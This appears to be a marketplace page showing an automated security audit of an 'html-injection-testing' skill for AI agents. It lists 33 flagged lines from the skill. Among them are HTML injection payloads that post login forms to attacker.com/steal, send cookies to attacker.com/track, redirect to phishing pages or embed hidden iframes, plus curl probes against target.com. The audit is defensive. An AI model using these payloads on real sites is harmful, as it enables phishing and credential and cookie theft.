html-injection-testing
Identifies and exploits HTML injection vulnerabilities in web applications, providing reports and remediation guidance.
Install this skill
Security score
The html-injection-testing skill was audited on Mar 5, 2026 and we found 33 security issues across 3 threat categories. Review the findings below before installing.
Categories Tested
Security Issues
Curl to non-GitHub URL
| 128 | curl "http://target.com/search?q=<h1>Test</h1>" |
Curl to non-GitHub URL
| 131 | curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold" |
Curl to non-GitHub URL
| 134 | curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E" |
Unicode escape sequences
| 332 | \u003ch1\u003eUnicode\u003c/h1\u003e |
Unicode escape sequences
| 470 | | Unicode | `\u003c` = `<` | |
External URL reference
| 117 | <a href="http://attacker.com">Click Here</a> |
External URL reference
| 118 | <a href="http://attacker.com">Legitimate Link</a> |
External URL reference
| 121 | <img src="http://attacker.com/image.png"> |
External URL reference
| 128 | curl "http://target.com/search?q=<h1>Test</h1>" |
External URL reference
| 131 | curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold" |
External URL reference
| 134 | curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E" |
External URL reference
| 148 | <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p> |
External URL reference
| 153 | <form action="http://attacker.com/steal" method="POST"> |
External URL reference
| 166 | http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal"> |
External URL reference
| 169 | http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee> |
External URL reference
| 179 | http://target.com/submit |
External URL reference
| 183 | http://target.com/register |
External URL reference
| 192 | http://target.com/page/<h1>Injected</h1> |
External URL reference
| 195 | http://target.com/users/<img src=x>/profile |
External URL reference
| 208 | <form action="http://attacker.com/capture" method="POST"> |
External URL reference
| 219 | input { background: url('http://attacker.com/log?data=') } |
External URL reference
| 221 | <form action="http://attacker.com/steal" method="POST"> |
External URL reference
| 230 | http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%2 |
External URL reference
| 252 | <img src="http://attacker.com/defaced.jpg" |
External URL reference
| 268 | body { background: url('http://attacker.com/track?cookie='+document.cookie) } |
External URL reference
| 274 | <div style="background:url('http://attacker.com/log')">Content</div> |
External URL reference
| 281 | <meta http-equiv="refresh" content="0;url=http://attacker.com/phish"> |
External URL reference
| 291 | <form action="http://attacker.com/steal"> |
External URL reference
| 302 | <iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe> |
External URL reference
| 305 | <iframe src="http://attacker.com/track" style="display:none"></iframe> |
External URL reference
| 369 | target = "http://target.com/search" |
External URL reference
| 377 | "<a href='http://evil.com'>Click</a>", |
External URL reference
| 380 | "<iframe src='http://evil.com'></iframe>", |